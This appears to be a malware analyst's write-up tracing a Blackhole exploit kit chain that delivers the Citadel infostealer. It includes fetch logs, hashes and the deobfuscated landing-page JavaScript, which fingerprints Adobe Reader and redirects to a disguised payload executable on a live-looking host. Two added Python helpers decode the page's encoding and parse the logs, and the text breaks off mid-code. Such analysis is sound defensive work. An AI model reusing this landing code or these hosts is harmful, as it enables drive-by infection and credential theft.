===========================================
#MalwareMustDie!!!!!!!!!!
INFECTION OF CITADEL WITH BHEK
BHEK IS USING PARAMETER e & f
Exploit Method: AcroPDF.PDF
Payload download Method: Msxml2.XMLHTTP
Payload : Citadel/Trojan Password/InfoStealer
VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
===========
Only VT6/43 !!!!
==========
DrWeb : Trojan.PWS.Stealer.946
Norman : W32/Krypt.GB
McAfee-GW-Edition : PWS-Zbot.gen.aln
McAfee : PWS-Zbot.gen.aln
Fortinet : W32/Kryptik.WDV!tr
Panda : Suspicious file
Summary:
This trojan sends data from the infected PC over encrypted HTTP communication to
108.178.59.34 (see the network connection report below)
and also downloads other malware:
* GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
* GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
----------------------------
Set of infected file:
----------------------------
assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2
index.html.2 ad967ba32c54c59db0f4a947410d96f2
js.js d20a786ec45f68eb56f15a589c566b27
js.js.1 d20a786ec45f68eb56f15a589c566b27
js.js.2 d20a786ec45f68eb56f15a589c566b27
LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457
update_flash_player.exe bb53221e4220466c876dbfad9cede066
PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
===========================================
FULL ANALYSIS / #MalwareMustDie / @unixfreaxjp
===========================================
//LinkedIn Spam;
http://pastebin.com/raw.php?i=n7rppRJY
#Hint from @Xylit0l < Merci!!!!!!!!
//infected url detected:
...Privately
(LINE 170): Chase Mathis
---------------------------------------
//download PoC
--12:24:18-- http://www.nikecup.net/MSmxYk/index.html
=> `index.html.2'
Resolving www.nikecup.net... 62.149.131.163
Connecting to www.nikecup.net|62.149.131.163|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 422 [text/html]
12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]
--------------------------------
// cat the mess
----------------------------------
// fetch the js.js, noted: referer
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target="http://jbrnh.com/3ZKtSw8d/js.js"
--12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js
=> `js.js'
Resolving alpuyecamorelos.com... 209.62.88.194
Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:30:38 (2.29 MB/s) - `js.js' saved [73/73]
--12:31:06-- http://videorender.com.ar/kSWEngwv/js.js
=> `js.js.1'
Resolving videorender.com.ar... 174.37.144.224
Connecting to videorender.com.ar|174.37.144.224|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]
--12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js
=> `js.js.2'
Resolving jbrnh.com... 184.168.101.248
Connecting to jbrnh.com|184.168.101.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/x-javascript]
12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]
// all same contents↑
-----------------------------
// cat the mess (js.js)
document.location='http://108.178.59.34/links/assure_numb_engineers.php';
----------------------------
// fetch the mess, noted: referer, user agent
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target="http://108.178.59.34/links/assure_numb_engineers.php"
--12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php
=> `assure_numb_engineers.php'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]
----------------------------
// Voila..plugin Detect...in blurp..
if(020==0x10)d=document;
try{(d+"523")()}catch(dsgdsg){a=d[g](gg
s="";
for(i=0;;i++){
window.asd2();
if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1e;
for(i=0;i
--------------------------------------------------------
// deobfs the code
try {
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a)
}
}
, isDefined : function (b){
return typeof b != "undefined"
}
, isArray : function (b){
return (/array/i).test(Object.prototype.toString.call(b))
}
, isFunc : function (b){
return typeof b == "function"
}
, isString : function (b){
return typeof b == "string"
}
, isNum : function (b){
return typeof b == "number"
}
, isStrNum : function (b){
return (typeof b == "string" && (/\d/).test(b))
}
, getNumRegx : /[\d][\d\._,-]*/, splitNumRegx : /[\._,-]/g,
getNum : function (b, c){
var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
exec(b) : null;
return a ? a[0] : null
}
, compareNums : function (h, f, d){
var e = this , c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)){
if (e.isDefined(d) && d.compareNums){
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length);
a ++ ){
if (g(c[a], 10) > g(b[a], 10)){
return 1
}
if (g(c[a], 10) < g(b[a], 10)){
return - 1
}
}
}
return 0
}
, formatNum : function (b, c){
var d = this , a, e;
if (!d.isStrNum(b)){
return null
}
if (!d.isNum(c)){
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a ++ ){
if (/^(0+)(.+)$/.test(e[a])){
e[a] = RegExp.$2
}
if (a > c ||! (/\d/).test(e[a])){
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
}
, $$hasMimeType : function (a){
return function (c){
if (!a.isIE && c){
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b ++ ){
if (a.isString(d[b]) && /[^\s]/.test(d[b])){
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)){
return f
}
}
}
}
return null
}
}
, findNavPlugin : function (l, e, c){
var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ?
new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
for (f = 0; f < a.length; f ++ ){
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
if (!k ||! (k.test(m) || k.test(b))){
return a[f]
}
}
}
return null
}
, getMimeEnabledPlugin : function (k, m, c){
var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d ++ ){
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)){
if (!g ||! (g.test(l) || g.test(a))){
return f
}
}
}
}
return 0
}
, getPluginFileVersion : function (f, b){
var h = this , e, d, g, a, c = -1;
if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
return b
}
if (!b){
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a ++ ){
if (c > -1 && a > c && d[a] != "0"){
return b
}
if (g[a] != d[a]){
if (c == -1){
c = a
}
if (d[a] != "0"){
return b
}
}
}
return e
}
, AXO : window.ActiveXObject, getAXO : function (a){
var f = null, d, b = this , c = {
}
;
try {
f = new b.AXO(a)
}
catch (d){
}
return f
}
, convertFuncs : function (f){
var a, g, d, b = /^[\$][\$]/, c = this ;
for (a in f){
if (b.test(a)){
try {
g = a.slice(2);
if (g.length > 0 &&! f[g]){
f[g] = f[a](f);
delete f[a]
}
}
catch (d){
}
}
}
}
, initObj : function (e, b, d){
var a, c;
if (e){
if (e[b[0]] == 1 || d){
for (a = 0; a < b.length; a = a + 2){
e[b[a]] = b[a + 1]
}
}
for (a in e){
c = e[a];
if (c && c[b[0]] == 1){
this .initObj(c, b)
}
}
}
}
, initScript : function (){
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
}
;
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
}
, init : function (d){
var c = this , b, d, a = {
status : -3, plugin : 0
}
;
if (!c.isString(d)){
return a
}
if (d.length == 1){
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b ||! b.getVersion){
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)){
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
a.status = -2;
return a
}
a.status = 1;
return a
}
, fPush : function (b, a){
var c = this ;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
])))){
a.push(b)
}
}
, callArray : function (b){
var c = this , a;
if (c.isArray(b)){
for (a = 0; a < b.length; a ++ ){
if (b[a] === null){
return
}
c.call(b[a]);
b[a] = null
}
}
}
, call : function (c){
var b = this , a = b.isArray(c) ? c.length : -1;
if (a > 0 && b.isFunc(c[0])){
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
}
else {
if (b.isFunc(c)){
c(b)
}
}
}
, getVersionDelimiter : ",", $$getVersion : function (a){
return function (g, d, c){
var e = a.init(g), f, b, h = {
}
;
if (e.status < 0){
return null
}
;
f = e.plugin;
if (f.getVersionDone != 1){
f.getVersion(null, d, c);
if (f.getVersionDone === null){
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
}
, cleanup : function (){
}
, addWinEvent : function (d, c){
var e = this , a = window, b;
if (e.isFunc(c)){
if (a.addEventListener){
a.addEventListener(d, c, false)
}
else {
if (a.attachEvent){
a.attachEvent("on" + d, c)
}
else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
}
, winHandler : function (d, c){
return function (){
d();
if (typeof c == "function"){
c()
}
}
}
, WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
var b = {
}
;
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv){
a.onDoneEmptyDiv()
}
}
, winLoaded : false, $$onWindowLoaded : function (a){
return function (b){
if (a.winLoaded){
a.call(b)
}
else {
a.fPush(b, a.WLfuncs)
}
}
}
, div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
function (){
var d = this , b, h, c, a, f, g;
if (d.div && d.div.childNodes){
for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
c = d.div.childNodes[b];
if (c && c.childNodes){
for (h = c.childNodes.length - 1; h >= 0; h -- ){
g = c.childNodes[h];
try {
c.removeChild(g)
}
catch (f){
}
}
}
if (c){
try {
d.div.removeChild(c)
}
catch (f){
}
}
}
}
if (!d.div){
a = document.getElementById(d.divID);
if (a){
d.div = a
}
}
if (d.div && d.div.parentNode){
try {
d.div.parentNode.removeChild(d.div)
}
catch (f){
}
d.div = null
}
}
, DONEfuncs : [], onDoneEmptyDiv : function (){
var c = this , a, b;
if (!c.winLoaded){
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
return
}
for (a in c){
b = c[a];
if (b && b.funcs){
if (b.OTF == 3){
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a ++ ){
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
}
, getWidth : function (c){
if (c){
var a = c.scrollWidth || c.offsetWidth, b = this ;
if (b.isNum(a)){
return a
}
}
return - 1
}
, getTagStatus : function (m, g, a, b){
var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
g.span, i = c.getWidth(d);
if (!k ||! h ||! d ||! c.getDOMobj(m)){
return - 2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
return 0
}
if (l >= i){
return - 1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
if (!m.winLoaded && c.winLoaded){
return 1
}
if (m.winLoaded && c.isNum(b)){
if (!c.isNum(m.count)){
m.count = b
}
if (b - m.count >= 10){
return 1
}
}
}
}
catch (f){
}
return 0
}
, getDOMobj : function (g, a){
var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
try {
if (b && a){
d.div.focus()
}
}
catch (f){
}
return b ? c.firstChild : null
}
, setStyle : function (b, g){
var f = b.style, a, d, c = this ;
if (f && g){
for (a = 0; a < g.length; a = a + 2){
try {
f[g[a]] = g[a + 1]
}
catch (d){
}
}
}
}
, insertDivInBody : function (a, i){
var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
if (!g){
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
}
catch (h){
}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g){
if (g.firstChild && f.isDefined(g.insertBefore)){
g.insertBefore(a, g.firstChild)
}
else {
g.appendChild(a)
}
if (d){
g.removeChild(d)
}
}
else {
}
}
, insertHTML : function (g, b, h, a, l){
var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
"0px", "visibility", "visible"];
var i =
"outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)){
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)){
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2){
if (/[^\s]/.test(b[o + 1])){
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2){
if (/[^\s]/.test(h[o + 1])){
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
}
else {
q = a
}
if (!k.div){
j = n.getElementById(k.divID);
if (j){
k.div = j
}
else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
+ "px", "verticalAlign", "baseline", "display", "block"]));
if (!j){
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode){
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
}
catch (m){
}
;
try {
k.div.appendChild(p)
}
catch (m){
}
;
return {
span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
}
}
return {
span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
}
}
, Plugins : {
adobereader : {
mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
"PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
{
}
, pluginHasMimeType : function (d, c, f){
var b = this , e = b.$, a;
for (a in d){
if (d[a] && d[a].type && d[a].type == c){
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)){
return 1
}
return 0
}
, getVersion : function (l, j){
var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
if (d.isString(j)){
j = j.replace(/\s/g, "");
if (j){
k = j
}
}
else {
j = null
}
if (d.isDefined(g.INSTALLED[k])){
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE){
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0){
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j){
n = b
}
if (!b && d.hasMimeType(g.mimeType)){
b = d.findNavPlugin(a, 0)
}
if (b){
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1){
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
h = "9"
}
else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
h = "8"
}
}
}
}
}
else {
h = g.version
}
if (!d.isDefined(n)){
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
}
else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
""], "", g))).GetVersions();
for (m = 0; m < 5; m ++ ){
if (c.test(f) && (!h || RegExp.$1 > h)){
h = RegExp.$1
}
}
}
catch (i){
}
g.installed = h ? 1 : (b ? 0 : -1)
}
if (!g.version){
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
}
, zz : 0
}
}
;
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
}
catch (e){
}
if (typeof pdfver == 'string'){
pdfver = pdfver.split('.')
}
else {
pdfver = [0, 0, 0, 0]
}
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i) - 46).toString(16);
if (k.length == 1)k = "0" + k;
d.push(k);
}
;
return d.join("");
}
end_redirect = function (){
window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
}
;
window.onbeforeunload = function (){
return "";
}
;
document.write('');
setTimeout(end_redirect, 60000);
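// Added analyst helper (not part of the dumped landing page): the deobfuscated code above contains one string encoder, x(), which maps each character to hex(charCode - 46), and a version routine, formatNum, whose output the page first re-delimits with "." (PluginDetect.getVersion(".") sets the delimiter) and then splits into pdfver. The Python below reproduces both mappings so an analyst can reverse hex-encoded values of that shape and see exactly which version array the kit's exploit selection receives. The assumption that x() is what builds the hex parameter values named in the title (e and f) is mine; the page does not show their contents, and the sample strings are constructed.

```python
"""Reverse the x() hex mapping and reproduce the pdfver array from the BHEK landing page."""
import re


def bhek_x_encode(s):
    """Same mapping as the page's x(): hex(charCode - 46), zero-padded to two digits.
    Restricted to char codes 46..301 so the output is a clean run of hex pairs
    (JS would emit '-1', '-2e' ... for smaller codes, which no pair decoder survives)."""
    out = []
    for ch in s:
        v = ord(ch) - 46
        if not 0 <= v <= 0xFF:
            raise ValueError(f"character {ch!r} (code {ord(ch)}) is outside the encodable range")
        out.append(f"{v:02x}")
    return "".join(out)


def bhek_x_decode(hexstr):
    """Inverse of bhek_x_encode: split into pairs, parse as hex, add 46 back."""
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", hexstr):
        raise ValueError("not a run of two-digit hex pairs")
    return "".join(chr(int(hexstr[i:i + 2], 16) + 46) for i in range(0, len(hexstr), 2))


def format_num(ver, places=4):
    """Port of PluginDetect.formatNum: 'a.b.c' -> 'a,b,c,0', leading zeros stripped,
    non-numeric or out-of-range fields forced to '0'. Returns None for non-version input."""
    if not isinstance(ver, str) or not re.search(r"\d", ver):
        return None
    parts = re.split(r"[._,-]", re.sub(r"\s", "", ver)) + ["0"] * 4
    for i in range(4):
        m = re.match(r"^(0+)(.+)$", parts[i])
        if m:
            parts[i] = m.group(2)
        if i > places - 1 or not re.search(r"\d", parts[i]):
            parts[i] = "0"
    return ",".join(parts[:4])


def pdfver_as_seen_by_kit(installed_version):
    """What the landing page ends up with in pdfver: getVersion('.') switches the
    delimiter to '.', getVersion('AdobeReader') returns the formatted string, and the
    page does pdfver.split('.'); with no Reader installed it falls back to [0,0,0,0]."""
    formatted = format_num(installed_version) if installed_version else None
    if formatted is None:
        return [0, 0, 0, 0]
    return formatted.replace(",", ".").split(".")


if __name__ == "__main__":
    sample = "AdobeReader"                      # constructed sample string
    enc = bhek_x_encode(sample)
    print(sample, "->", enc, "->", bhek_x_decode(enc))
    for v in ("9.4.0", "10.01.3", None):
        print(v, "->", pdfver_as_seen_by_kit(v))
```

Running it shows that an installed version string such as "9.4.0" reaches the exploit-selection code as ["9","4","0","0"], and that a machine without Reader is represented as [0,0,0,0]; the same format_num logic is what makes the kit's version comparisons deterministic enough to reproduce in a detection sandbox.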
------------------------------------
// infection analysis per exploit & PluginDetect hint..
===================
EXPLOIT-ED BY:
===================
// , Plugins : {
// adobereader : {
// mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
// "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
===================
DOWNLOADED VIA:
===================
// var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
// "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
// "Scripting.Dictionary", "wmplayer.ocx"];
// for (f = 0; f < j.length; f ++ ){
// if (c.getAXO(j[f])){
// c.ActiveXEnabled = true;
// break
*********** Please note: the parameters are var f, j *****************
===================
TO URL:
===================
// end_redirect = function (){
// window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
//
--------------download PoC------------------------------------------------
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://108.178.59.34/links/assure_numb_engineers.php"
--target="http://108.178.59.34/adobe/update_flash_player.exe"
--12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe
=> `update_flash_player.exe'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150,616 (147K) [application/octet-stream]
12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD
---------------INFECTION CROSS REFERENCE AUTOMATION------------------
[2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
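// Added example (my code, not the cross-reference tool's): a parser over the honeyclient log lines above that rebuilds the redirect chain from the spam landing URL through the js.js hops to the BHEK landing page, collects hosts and MD5s as IOCs, and flags redirect targets that answered 4xx. That last check is worth keeping: the automation got 403 from assure_numb_engineers.php, while the manual fetch above with a browser User-Agent and the expected Referer got 200 and the 27 KB exploit page, so a 403 on a redirect target is a hint that the server gates on request headers rather than a sign the page is dead. The embedded lines are copied from this page's log; no other input is assumed.

```python
"""Rebuild the BHEK redirect chain and pull IOCs from honeyclient log lines."""
import re
from urllib.parse import urlsplit

# Sample input: lines copied from the cross-reference automation log on this page
# (the [MongoDB] line is kept to show that unrelated lines are skipped).
SAMPLE_LOG = """\
[2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
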